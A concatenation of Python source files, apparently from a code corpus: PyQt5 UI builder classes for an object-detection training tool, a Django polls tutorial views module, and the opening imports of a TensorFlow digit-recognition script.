        self.label_2.setObjectName("label_2")
        self.label_3 = QtWidgets.QLabel(Dialog)
        self.label_3.setGeometry(QtCore.QRect(20, 100, 115, 21))
        self.label_3.setObjectName("label_3")
        self.label_4 = QtWidgets.QLabel(Dialog)
        self.label_4.setGeometry(QtCore.QRect(20, 140, 91, 21))
        self.label_4.setObjectName("label_4")
        self.label_5 = QtWidgets.QLabel(Dialog)
        self.label_5.setGeometry(QtCore.QRect(20, 180, 91, 21))
        self.label_5.setObjectName("label_5")
        self.textEdit = QtWidgets.QTextEdit(Dialog)
        self.textEdit.setGeometry(QtCore.QRect(20, 210, 90, 21))
        self.textEdit.setObjectName("textEdit")
        self.label_6 = QtWidgets.QLabel(Dialog)
        self.label_6.setGeometry(QtCore.QRect(20, 280, 91, 21))
        self.label_6.setObjectName("label_6")
        self.label_7 = QtWidgets.QLabel(Dialog)
        self.label_7.setGeometry(QtCore.QRect(210, 60, 91, 21))
        self.label_7.setObjectName("label_7")
        # NOTE(review): these QCheckBox widgets carry "radioButton*" object
        # names -- presumably converted from radio buttons at some point;
        # confirm nothing looks them up by objectName before renaming.
        self.checkBox = QtWidgets.QCheckBox(Dialog)
        self.checkBox.setGeometry(QtCore.QRect(180, 20, 61, 21))
        self.checkBox.setObjectName("radioButton")
        self.checkBox_2 = QtWidgets.QCheckBox(Dialog)
        self.checkBox_2.setGeometry(QtCore.QRect(250, 20, 61, 21))
        self.checkBox_2.setObjectName("radioButton_2")
        self.spinBox = QtWidgets.QSpinBox(Dialog)
        self.spinBox.setGeometry(QtCore.QRect(220, 100, 42, 22))
        self.spinBox.setObjectName("spinBox")
        self.checkBox_3 = QtWidgets.QCheckBox(Dialog)
        self.checkBox_3.setGeometry(QtCore.QRect(250, 140, 81, 21))
        self.checkBox_3.setObjectName("radioButton_3")
        self.checkBox_4 = QtWidgets.QCheckBox(Dialog)
        self.checkBox_4.setGeometry(QtCore.QRect(160, 140, 81, 21))
        self.checkBox_4.setObjectName("radioButton_4")
        self.listWidget = QtWidgets.QListWidget(Dialog)
        self.listWidget.setGeometry(QtCore.QRect(150, 180, 181, 71))
        self.listWidget.setObjectName("listWidget")
        self.pushButton = QtWidgets.QPushButton(Dialog)
        self.pushButton.setGeometry(QtCore.QRect(210, 280, 75, 23))
        self.pushButton.setObjectName("pushButton")
        self.pushButton_2 = QtWidgets.QPushButton(Dialog)
        self.pushButton_2.setGeometry(QtCore.QRect(113, 198, 36, 21))
        self.pushButton_2.setObjectName("pushButton_2")
        self.pushButton_3 = QtWidgets.QPushButton(Dialog)
        self.pushButton_3.setGeometry(QtCore.QRect(113, 222, 36, 21))
        self.pushButton_3.setObjectName("pushButton_3")
        self.retranslateUi(Dialog)
        # Standard dialog wiring: OK -> accept(), Cancel -> reject().
        self.buttonBox.accepted.connect(Dialog.accept)
        self.buttonBox.rejected.connect(Dialog.reject)
        QtCore.QMetaObject.connectSlotsByName(Dialog)
    def retranslateUi(self, Dialog):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
        Dialog.setStyleSheet('font-family : Arial')
        self.label.setText(_translate("Dialog", "USE"))
        self.label_2.setText(_translate("Dialog", "MODE"))
        self.label_3.setText(_translate("Dialog", "Detection Rate (%)"))
        self.label_4.setText(_translate("Dialog", "Backbone"))
        self.label_5.setText(_translate("Dialog", "Class Label"))
        self.label_6.setText(_translate("Dialog", "Color Splash"))
        self.label_7.setText(_translate("Dialog", "\'Inference\'"))
        self.checkBox.setText(_translate("Dialog", "CPU"))
        self.checkBox_2.setText(_translate("Dialog", "GPU"))
        self.checkBox_3.setText(_translate("Dialog", "Resnet 101"))
        self.checkBox_4.setText(_translate("Dialog", "Resnet 50"))
        self.pushButton.setText(_translate("Dialog", "ON"))
        self.pushButton_2.setText(_translate("Dialog", "Add"))
        self.pushButton_3.setText(_translate("Dialog", "Del"))
class Ui_Show_All(object):
    """UI builder for the "View Loss" window: a single full-size
    QTextBrowser that displays the training-loss log."""
    def setupUi(self, Dialog):
        """Create the text browser on *Dialog* and wire signals."""
        Dialog.setObjectName("Dialog")
        Dialog.resize(1030, 684)
        self.textBrowser = QtWidgets.QTextBrowser(Dialog)
        self.textBrowser.setGeometry(QtCore.QRect(10, 10, 1011, 662))
        self.textBrowser.setObjectName("textBrowser")
        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)
    def retranslateUi(self, Dialog):
        """Set window title and stylesheet; browser content is filled elsewhere."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "View Loss"))
        Dialog.setStyleSheet('font-family : Arial')
        # self.textBrowser.setText(_translate("Dialog", "TRAINING LOSS"))
class Ui_Show(object):
    """UI builder for the training-progress ("Show Box") panel: show/clear/
    stop/pause controls above a large list widget for log lines."""
    def setupUi(self, Form):
        """Create and place all widgets on *Form*, then wire signals."""
        Form.setObjectName("Form")
        Form.resize(447, 136)
        self.pushButton = QtWidgets.QPushButton(Form)
        self.pushButton.setGeometry(QtCore.QRect(440, 21, 80, 23))
        self.pushButton.setObjectName("pushButton")
        self.pushButton_2 = QtWidgets.QPushButton(Form)
        self.pushButton_2.setGeometry(QtCore.QRect(350, 21, 86, 23))
        self.pushButton_2.setObjectName("pushButton_2")
        self.pushButton_3 = QtWidgets.QPushButton(Form)
        self.pushButton_3.setGeometry(QtCore.QRect(255, 21, 91, 23))
        self.pushButton_3.setObjectName("pushButton_3")
        self.pushButton_4 = QtWidgets.QPushButton(Form)
        self.pushButton_4.setGeometry(QtCore.QRect(440, 0, 80, 20))
        self.pushButton_4.setObjectName("pushButton_4")
        self.pushButton_5 = QtWidgets.QPushButton(Form)
        self.pushButton_5.setGeometry(QtCore.QRect(255, 0, 91, 20))
        self.pushButton_5.setObjectName("pushButton_5")
        self.pushButton_6 = QtWidgets.QPushButton(Form)
        self.pushButton_6.setGeometry(QtCore.QRect(350, 0, 86, 20))
        self.pushButton_6.setObjectName("pushButton_6")
        self.label = QtWidgets.QLabel(Form)
        self.label.setGeometry(QtCore.QRect(30, 20, 80, 21))
        self.label.setObjectName("label")
        # label_2..label_4 are placeholders; no text is assigned in
        # retranslateUi, so they render empty until set by the controller.
        self.label_2 = QtWidgets.QLabel(Form)
        self.label_2.setGeometry(QtCore.QRect(110, 20, 45, 21))
        self.label_2.setObjectName("label_2")
        self.label_3 = QtWidgets.QLabel(Form)
        self.label_3.setGeometry(QtCore.QRect(30, 0, 120, 19))
        self.label_3.setObjectName("label_3")
        self.label_4 = QtWidgets.QLabel(Form)
        self.label_4.setGeometry(QtCore.QRect(20, 218, 100, 19))
        self.label_4.setObjectName("label_4")
        self.listWidget = QtWidgets.QListWidget(Form)
        self.listWidget.setGeometry(QtCore.QRect(20, 50, 500, 165))
        # NOTE(review): objectName "listView" does not match the attribute
        # name listWidget; confirm no objectName lookup before renaming.
        self.listWidget.setObjectName("listView")
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        Form.setStyleSheet('font-family : Arial')
        self.pushButton.setText(_translate("Form", "Show All"))
        self.pushButton_2.setText(_translate("Form", "Mode Change"))
        self.pushButton_3.setText(_translate("Form", "Stop Training"))
        self.pushButton_4.setText(_translate("Form", "Clear"))
        self.pushButton_5.setText(_translate("Form", "Cancel Stop"))
        self.pushButton_6.setText(_translate("Form", "Pause Train"))
        self.label.setText(_translate("Form", "Show Box"))
class Ui_Train(object):
    """UI builder for the training panel: start / TensorBoard show & close
    buttons above a list widget ("Train Ready Box")."""
    # training Check
    def setupUi(self, Form):
        """Create and place all widgets on *Form*, then wire signals."""
        Form.setObjectName("Form")
        Form.resize(448, 157)
        self.pushButton_3 = QtWidgets.QPushButton(Form)
        self.pushButton_3.setGeometry(QtCore.QRect(390, 20, 81, 23))
        self.pushButton_3.setObjectName("pushButton_3")
        self.pushButton_4 = QtWidgets.QPushButton(Form)
        self.pushButton_4.setGeometry(QtCore.QRect(305, 20, 81, 23))
        self.pushButton_4.setObjectName("pushButton_4")
        self.pushButton_5 = QtWidgets.QPushButton(Form)
        self.pushButton_5.setGeometry(QtCore.QRect(220, 20, 81, 23))
        self.pushButton_5.setObjectName("pushButton_5")
        self.label_8 = QtWidgets.QLabel(Form)
        self.label_8.setGeometry(QtCore.QRect(30, 20, 181, 21))
        self.label_8.setObjectName("label_8")
        self.listWidget = QtWidgets.QListWidget(Form)
        self.listWidget.setGeometry(QtCore.QRect(20, 50, 450, 91))
        self.listWidget.setObjectName("listWidget")
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        Form.setStyleSheet('font-family : Arial')
        self.pushButton_3.setText(_translate("Form", "Train Start"))
        self.pushButton_4.setText(_translate("Form", "Show Tensor"))
        self.pushButton_5.setText(_translate("Form", "close Tensor"))
        self.label_8.setText(_translate("Form", "Train Ready Box"))
class Ui_Json(object):
    """UI builder for the JSON-file panel: an import button and a list view
    showing loaded annotation (JSON) files."""
    # json file list
    def setupUi(self, Form):
        """Create and place all widgets on *Form*, then wire signals."""
        Form.setObjectName("Form")
        Form.resize(294, 190)
        self.listView_3 = QtWidgets.QListView(Form)
        self.listView_3.setGeometry(QtCore.QRect(10, 45, 261, 140))
        self.listView_3.setObjectName("listView_3")
        self.label_4 = QtWidgets.QLabel(Form)
        self.label_4.setGeometry(QtCore.QRect(10, 10, 101, 31))
        self.label_4.setObjectName("label_4")
        self.pushButton_5 = QtWidgets.QPushButton(Form)
        self.pushButton_5.setGeometry(QtCore.QRect(180, 10, 91, 21))
        self.pushButton_5.setObjectName("pushButton_5")
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        Form.setStyleSheet('font-family : Arial')
        self.label_4.setText(_translate("Form", "JSON File"))
        self.pushButton_5.setText(_translate("Form", "Import JSON"))
class Ui_Data(object):
    """UI builder for the image-file panel: an import button and a list view
    showing loaded image files."""
    # image file list
    def setupUi(self, Form):
        """Create and place all widgets on *Form*, then wire signals."""
        Form.setObjectName("Form")
        Form.resize(295, 220)
        self.pushButton_4 = QtWidgets.QPushButton(Form)
        self.pushButton_4.setGeometry(QtCore.QRect(180, 20, 91, 21))
        self.pushButton_4.setObjectName("pushButton_4")
        self.listView_2 = QtWidgets.QListView(Form)
        self.listView_2.setGeometry(QtCore.QRect(10, 50, 261, 151))
        self.listView_2.setObjectName("listView_2")
        self.label_3 = QtWidgets.QLabel(Form)
        self.label_3.setGeometry(QtCore.QRect(10, 20, 91, 21))
        self.label_3.setObjectName("label_3")
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        Form.setStyleSheet('font-family : Arial')
        self.pushButton_4.setText(_translate("Form", "Import Image"))
        self.label_3.setText(_translate("Form", "Image File"))
class Ui_ConfigOpt(object):
    """UI builder for the full training-configuration dialog: epoch/batch/
    learning-rate inputs, CPU-GPU and backbone checkboxes, steps-per-epoch
    and GPU-count spinners, mask option, layer selector, train/val ratio
    slider and an OK/Cancel button box."""
    def setupUi(self, Dialog):
        """Create and place all widgets on *Dialog*, then wire signals."""
        Dialog.setObjectName("Dialog")
        Dialog.resize(349, 440)
        self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
        self.buttonBox.setGeometry(QtCore.QRect(80, 400, 171, 32))
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonBox.setObjectName("buttonBox")
        self.label = QtWidgets.QLabel(Dialog)
        self.label.setGeometry(QtCore.QRect(110, 10, 131, 21))
        self.label.setObjectName("label")
        self.lineEdit = QtWidgets.QLineEdit(Dialog)
        self.lineEdit.setGeometry(QtCore.QRect(250, 100, 81, 21))
        self.lineEdit.setText("")
        self.lineEdit.setObjectName("lineEdit")
        self.spinBox = QtWidgets.QSpinBox(Dialog)
        self.spinBox.setGeometry(QtCore.QRect(260, 40, 71, 22))
        self.spinBox.setObjectName("spinBox")
        self.label_2 = QtWidgets.QLabel(Dialog)
        self.label_2.setGeometry(QtCore.QRect(10, 40, 131, 21))
        self.label_2.setObjectName("label_2")
        self.label_3 = QtWidgets.QLabel(Dialog)
        self.label_3.setGeometry(QtCore.QRect(10, 70, 131, 21))
        self.label_3.setObjectName("label_3")
        self.label_4 = QtWidgets.QLabel(Dialog)
        self.label_4.setGeometry(QtCore.QRect(10, 100, 131, 21))
        self.label_4.setObjectName("label_4")
        self.label_5 = QtWidgets.QLabel(Dialog)
        self.label_5.setGeometry(QtCore.QRect(10, 190, 131, 21))
        self.label_5.setObjectName("label_5")
        self.label_6 = QtWidgets.QLabel(Dialog)
        self.label_6.setGeometry(QtCore.QRect(10, 160, 131, 21))
        self.label_6.setObjectName("label_6")
        self.label_7 = QtWidgets.QLabel(Dialog)
        self.label_7.setGeometry(QtCore.QRect(10, 220, 131, 21))
        self.label_7.setObjectName("label_7")
        self.label_8 = QtWidgets.QLabel(Dialog)
        self.label_8.setGeometry(QtCore.QRect(10, 130, 131, 21))
        self.label_8.setObjectName("label_8")
        self.checkBox = QtWidgets.QCheckBox(Dialog)
        self.checkBox.setGeometry(QtCore.QRect(170, 130, 81, 21))
        self.checkBox.setObjectName("checkBox")
        self.checkBox_2 = QtWidgets.QCheckBox(Dialog)
        self.checkBox_2.setGeometry(QtCore.QRect(260, 130, 81, 21))
        self.checkBox_2.setObjectName("checkBox_2")
        self.checkBox_3 = QtWidgets.QCheckBox(Dialog)
        self.checkBox_3.setGeometry(QtCore.QRect(260, 160, 81, 21))
        self.checkBox_3.setObjectName("checkBox_3")
        self.checkBox_4 = QtWidgets.QCheckBox(Dialog)
        self.checkBox_4.setGeometry(QtCore.QRect(170, 160, 81, 21))
        self.checkBox_4.setObjectName("checkBox_4")
        self.spinBox_3 = QtWidgets.QSpinBox(Dialog)
        self.spinBox_3.setGeometry(QtCore.QRect(280, 190, 42, 22))
        self.spinBox_3.setObjectName("spinBox_3")
        self.spinBox_4 = QtWidgets.QSpinBox(Dialog)
        self.spinBox_4.setGeometry(QtCore.QRect(280, 220, 42, 22))
        self.spinBox_4.setObjectName("spinBox_4")
        self.label_11 = QtWidgets.QLabel(Dialog)
        self.label_11.setGeometry(QtCore.QRect(10, 250, 100, 21))
        self.label_11.setObjectName("label_11")
        self.spinBox_5 = QtWidgets.QSpinBox(Dialog)
        self.spinBox_5.setGeometry(QtCore.QRect(260, 250, 62, 22))
        self.spinBox_5.setObjectName("spinBox_5")
        self.listWidget = QtWidgets.QListWidget(Dialog)
        self.listWidget.setGeometry(QtCore.QRect(250, 70, 81, 21))
        # NOTE(review): objectName "listView" differs from attribute name.
        self.listWidget.setObjectName("listView")
        self.label_9 = QtWidgets.QLabel(Dialog)
        self.label_9.setGeometry(QtCore.QRect(10, 280, 131, 21))
        self.label_9.setObjectName("label_9")
        self.pushButton = QtWidgets.QPushButton(Dialog)
        self.pushButton.setGeometry(QtCore.QRect(280, 280, 35, 21))
        self.pushButton.setObjectName("pushButton")
        self.label_10 = QtWidgets.QLabel(Dialog)
        self.label_10.setGeometry(QtCore.QRect(10, 310, 100, 21))
        self.label_10.setObjectName("label_10")
        self.comboBox = QtWidgets.QComboBox(Dialog)
        self.comboBox.setGeometry(QtCore.QRect(260, 310, 65, 22))
        self.comboBox.setObjectName("comboBox")
        self.label_12 = QtWidgets.QLabel(Dialog)
        self.label_12.setGeometry(QtCore.QRect(10, 340, 110, 21))
        self.label_12.setObjectName("label_12")
        self.horizontalSlider_2 = QtWidgets.QSlider(Dialog)
        self.horizontalSlider_2.setGeometry(QtCore.QRect(125, 340, 200, 30))
        self.horizontalSlider_2.setOrientation(QtCore.Qt.Horizontal)
        self.horizontalSlider_2.setRange(20, 100) # range (min, max)
        self.horizontalSlider_2.setValue(90)
        self.horizontalSlider_2.setObjectName("horizontalSlider_2")
        self.listWidget_2 = QtWidgets.QListWidget(Dialog)
        self.listWidget_2.setGeometry(QtCore.QRect(135, 375, 170, 21))
        # NOTE(review): objectName "listView" duplicated with self.listWidget.
        self.listWidget_2.setObjectName("listView")
        self.retranslateUi(Dialog)
        # Standard dialog wiring: OK -> accept(), Cancel -> reject().
        self.buttonBox.accepted.connect(Dialog.accept)
        self.buttonBox.rejected.connect(Dialog.reject)
        QtCore.QMetaObject.connectSlotsByName(Dialog)
    def retranslateUi(self, Dialog):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
        Dialog.setStyleSheet('Font-family : Arial')
        self.label.setText(_translate("Dialog", "Configuration Option"))
        self.label_2.setText(_translate("Dialog", "Epoch"))
        self.label_3.setText(_translate("Dialog", "Batch Size"))
        self.label_4.setText(_translate("Dialog", "Learning Rate"))
        self.label_5.setText(_translate("Dialog", "GPU COUNT"))
        self.label_6.setText(_translate("Dialog", "CPU / GPU"))
        self.label_7.setText(_translate("Dialog", "Images per GPU"))
        self.label_8.setText(_translate("Dialog", "BACKBONE"))
        self.label_9.setText(_translate("Dialog", "Mask opt"))
        self.label_10.setText(_translate("Dialog", "Layers"))
        self.label_11.setText(_translate("Dialog", "Steps per Ep"))
        self.label_12.setText(_translate("Dialog", "Train/Val Ratio"))
        self.checkBox.setText(_translate("Dialog", "Resnet50"))
        self.checkBox_2.setText(_translate("Dialog", "Resnet101"))
        self.checkBox_3.setText(_translate("Dialog", "GPU"))
        self.checkBox_4.setText(_translate("Dialog", "CPU"))
        self.pushButton.setText(_translate("Dialog", "On"))
class Ui_ConfigList(object):
    """UI builder for the configuration-list panel: a Config button above a
    list widget of saved configurations."""
    # config _list
    def setupUi(self, Form):
        """Create and place all widgets on *Form*, then wire signals."""
        Form.setObjectName("Form")
        Form.resize(200, 281)
        self.pushButton = QtWidgets.QPushButton(Form)
        self.pushButton.setGeometry(QtCore.QRect(10, 10, 75, 23))
        self.pushButton.setObjectName("pushButton")
        self.listWidget_5 = QtWidgets.QListWidget(Form)
        self.listWidget_5.setGeometry(QtCore.QRect(10, 40, 210, 240))
        # NOTE(review): objectName "listView_5" differs from attribute name.
        self.listWidget_5.setObjectName("listView_5")
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        Form.setStyleSheet('font-family: Arial')
        self.pushButton.setText(_translate("Form", "Config"))
class Ui_Config(object):
    """UI builder for the quick-config panel: spinners for epoch, GPU count
    and images-per-GPU plus a line edit for the learning rate."""
    # fast config ctrl
    def setupUi(self, Form):
        """Create and place all widgets on *Form*, then wire signals."""
        Form.setObjectName("Form")
        Form.resize(230, 150)
        self.label_5 = QtWidgets.QLabel(Form)
        self.label_5.setGeometry(QtCore.QRect(10, 20, 81, 21))
        self.label_5.setObjectName("label_5")
        self.spinBox = QtWidgets.QSpinBox(Form)
        self.spinBox.setGeometry(QtCore.QRect(150, 20, 71, 22))
        self.spinBox.setObjectName("spinBox")
        self.label_6 = QtWidgets.QLabel(Form)
        self.label_6.setGeometry(QtCore.QRect(10, 50, 71, 21))
        self.label_6.setObjectName("label_6")
        self.label_7 = QtWidgets.QLabel(Form)
        self.label_7.setGeometry(QtCore.QRect(10, 80, 80, 21))
        self.label_7.setObjectName("label_7")
        self.spinBox_2 = QtWidgets.QSpinBox(Form)
        self.spinBox_2.setGeometry(QtCore.QRect(150, 50, 71, 22))
        self.spinBox_2.setObjectName("spinBox_2")
        self.spinBox_3 = QtWidgets.QSpinBox(Form)
        self.spinBox_3.setGeometry(QtCore.QRect(150, 80, 71, 22))
        self.spinBox_3.setObjectName("spinBox_3")
        self.label = QtWidgets.QLabel(Form)
        self.label.setGeometry(QtCore.QRect(10, 110, 81, 21))
        self.label.setObjectName("label")
        self.lineEdit = QtWidgets.QLineEdit(Form)
        self.lineEdit.setGeometry(QtCore.QRect(140, 110, 81, 21))
        self.lineEdit.setObjectName("lineEdit")
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        Form.setStyleSheet('font-family : Arial')
        self.label_5.setText(_translate("Form", "Epoch"))
        self.label_6.setText(_translate("Form", "GPU Count"))
        self.label_7.setText(_translate("Form", "Img per GPU"))
        self.label.setText(_translate("Form", "Learning Rate"))
class Ui_Class(object):
    """UI builder for the attribute-class panel: a title label above a list
    widget of class names. Add/Del controls are commented out (disabled)."""
    def setupUi(self, Form):
        """Create and place all widgets on *Form*, then wire signals."""
        Form.setObjectName("Form")
        Form.resize(280, 180)
        # self.pushButton_1 = QtWidgets.QPushButton(Form)
        # self.pushButton_1.setGeometry(QtCore.QRect(190, 50, 81, 23))
        # self.pushButton_1.setObjectName("pushButton_6")
        # self.pushButton_2 = QtWidgets.QPushButton(Form)
        # self.pushButton_2.setGeometry(QtCore.QRect(190, 20, 81, 23))
        # self.pushButton_2.setObjectName("pushButton_2")
        self.listWidget = QtWidgets.QListWidget(Form)
        self.listWidget.setGeometry(QtCore.QRect(10, 50, 261, 145))
        self.listWidget.setObjectName("listWidget")
        # self.label = QtWidgets.QLabel(Form)
        # self.label.setGeometry(QtCore.QRect(10, 40, 51, 31))
        # self.label.setObjectName("label")
        self.label_2 = QtWidgets.QLabel(Form)
        self.label_2.setGeometry(QtCore.QRect(10, 10, 91, 31))
        self.label_2.setObjectName("label_2")
        # self.lineEdit_2 = QtWidgets.QLineEdit(Form)
        # self.lineEdit_2.setGeometry(QtCore.QRect(50, 40, 131, 31))
        # self.lineEdit_2.setObjectName("lineEdit_2")
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        Form.setStyleSheet('font-family : Arial')
        # self.pushButton_1.setText(_translate("Form", "Add"))
        # self.pushButton_2.setText(_translate("Form", "Del"))
        # self.label.setText(_translate("Form", "Put in"))
        self.label_2.setText(_translate("Form", "Attribute Class"))
"jinwoo6612@naver.com"
] | jinwoo6612@naver.com |
e06b03019bec6c707b19cfc1bdac6a5392f11eac | 98423db72fb471ba8a21e1e89a186a50c490e001 | /polls/views.py | 6e7ad747c5c31063678bbc8091fa9364efface69 | [] | no_license | IchigoMilk/django-tutorial | 9b66422e84e80ac9ae35f4501c690479663853da | b03629196b537f7834440de032cf5013589526ea | refs/heads/master | 2021-05-08T14:52:16.696499 | 2018-03-28T14:41:41 | 2018-03-28T14:41:41 | 120,100,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,670 | py | from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.views import generic
from django.utils import timezone
from .models import Choice, Question
class IndexView(generic.ListView):
    """Front page: the five most recently published questions."""
    # Without template_name, Django would default to <app name>/<model name>_list.html
    template_name = 'polls/index.html'
    # Likewise the default context variable name would be question_list
    context_object_name = 'latest_question_list'
    def get_queryset(self):
        # return the last five published questions (not including those set to be published in the future).
        return Question.objects.filter(pub_date__lte=timezone.now()).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
    """Detail page for one question; unpublished questions are hidden."""

    model = Question
    template_name = 'polls/detail.html'

    def get_queryset(self):
        # Exclude questions whose pub_date lies in the future.
        return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
    """Vote tally page for a single question."""

    model = Question
    template_name = 'polls/results.html'
def vote(request, question_id):
    """Record a POSTed vote for one of the question's choices.

    Re-renders the detail page with an error message when no choice was
    selected (or an unknown choice id was posted); otherwise increments
    the tally and redirects to the results page.
    """
    question = get_object_or_404(Question, pk=question_id)
    try:
        selected_choice = question.choice_set.get(pk=request.POST['choice'])
    except (KeyError, Choice.DoesNotExist):
        # Redisplay the question voting form.
        return render(request, 'polls/detail.html', {
            'question': question,
            'error_message': "You didn't select a choice.",
        })
    else:
        # F() performs the increment inside the database, avoiding the race
        # where two concurrent requests both read the old count and then
        # both write count+1 (losing one vote).
        selected_choice.votes = F('votes') + 1
        selected_choice.save()
        # Always return an HttpResponseRedirect after successfully dealing
        # with POST data. This prevents data from being posted twice if a
        # user hits the Back button.
        return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| [
"socket65536@gmail.com"
] | socket65536@gmail.com |
cc2b9367dcb75a3613b7456a24d7379ffed94e1f | 23daf97312ea16cc399feedfa048131d564b83fa | /lib/BluenetLib/lib/core/bluetooth_delegates/AioScanner.py | 1bdc096e712664a077ca209d4d5155cfeaf19041 | [] | no_license | wickyb94/programmer | 6e2cafa3fbb9f54bfdcd24f7062f6425ebb429fc | be0f01586365a79b51af8c4da376fe216d38afba | refs/heads/master | 2022-04-09T17:52:18.106331 | 2020-03-02T15:57:02 | 2020-03-02T15:57:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,569 | py | import asyncio
import sys
import time
import aioblescan
from BluenetLib.lib.util.LogUtil import tfs
counter = 0
prev = time.time()
start = time.time()
class AioScanner:
def __init__(self, hciIndex = 0):
self.event_loop = None
self.bluetoothControl = None
self.connection = None
self.timeRequestStart = 0
self.eventReceived = False
self.hciIndex = hciIndex
self.delegate = None
self.scanRunning = False
self.scanDuration = 0
def withDelegate(self, delegate):
self.delegate = delegate
return self
def start(self, duration):
self.scanRunning = True
self.scanDuration = duration
self.scan()
def stop(self):
self.scanRunning = False
def scan(self, attempt = 0):
print(tfs(), "Attempt Scanning")
self.eventReceived = False
event_loop = asyncio.new_event_loop()
bluetoothSocket = aioblescan.create_bt_socket(self.hciIndex)
transportProcess = event_loop._create_connection_transport(bluetoothSocket, aioblescan.BLEScanRequester, None, None)
self.connection, self.bluetoothControl = event_loop.run_until_complete(transportProcess)
print(tfs(), "Connection made!")
self.bluetoothControl.process = self.parsingProcess
self.timeRequestStart = time.time()
self.bluetoothControl.send_scan_request()
print(tfs(), "Scan command sent!")
alreadyCleanedUp = False
try:
event_loop.run_until_complete(self.awaitEventSleep(1))
if not self.eventReceived:
if attempt < 10:
print(tfs(), 'Retrying... Closing event loop', attempt)
self.cleanup(event_loop)
alreadyCleanedUp = True
self.scan(attempt + 1)
return
else:
pass
event_loop.run_until_complete(self.awaitActiveSleep(self.scanDuration))
except KeyboardInterrupt:
print('keyboard interrupt')
finally:
print("")
if not alreadyCleanedUp:
print(tfs(), 'closing event loop', attempt)
self.cleanup(event_loop)
async def awaitEventSleep(self, duration):
while self.eventReceived == False and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
async def awaitActiveSleep(self, duration):
while self.scanRunning == True and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
def cleanup(self, event_loop):
print(tfs(), "Cleaning up")
self.bluetoothControl.stop_scan_request()
self.connection.close()
event_loop.close()
def parsingProcess(self, data):
ev=aioblescan.HCI_Event()
xx=ev.decode(data)
hasAdvertisement = self.dataParser(ev)
if hasAdvertisement and self.delegate is not None:
self.delegate.handleDiscovery(ev)
def dataParser(self, data):
#parse Data required for the scanner
advertisementReceived = False
for d in data.payload:
if isinstance(d, aioblescan.aioblescan.HCI_CC_Event):
self.checkHCI_CC_EVENT(d)
elif isinstance(d, aioblescan.Adv_Data):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.HCI_LE_Meta_Event):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.aioblescan.HCI_LEM_Adv_Report):
self.eventReceived = True
advertisementReceived = True
return advertisementReceived
def checkHCI_CC_EVENT(self, event):
for d in event.payload:
if isinstance(d, aioblescan.aioblescan.OgfOcf):
if d.ocf == b'\x0b':
print(tfs(),"Settings received")
elif d.ocf == b'\x0c':
print(tfs(), "Scan command received")
# if isinstance(d, aioblescan.aioblescan.Itself):
# print("byte", d.name)
# if isinstance(d, aioblescan.aioblescan.UIntByte):
# print("UIntByte", d.val)
def parseAdvertisement(self, decodedHciEvent):
global counter
if counter % 50 == 0:
counter = 0
print(".")
else:
sys.stdout.write(".")
counter+= 1
# decodedHciEvent.show()
| [
"alexdemulder@gmail.com"
] | alexdemulder@gmail.com |
018d4933eefaf485450890317f1174539461ccc0 | 6cb7ea40aa0327e3117f43da16a995f092eb0ddd | /TrainDigitTF2.py | c0fa447b5308cbb045928860ad4ae086238840ec | [] | no_license | VectorL1990/DigitRecognition | ff63b0c992d5d044bb81361237654d43060b43d6 | 73f93cc388461b6b0b8aa0fadbd2f07a6d3599c3 | refs/heads/master | 2023-07-17T17:34:00.089287 | 2021-09-02T09:21:20 | 2021-09-02T09:21:20 | 397,887,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,274 | py | import os
from MnistLoader import MnistLoader
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
from PIL import Image
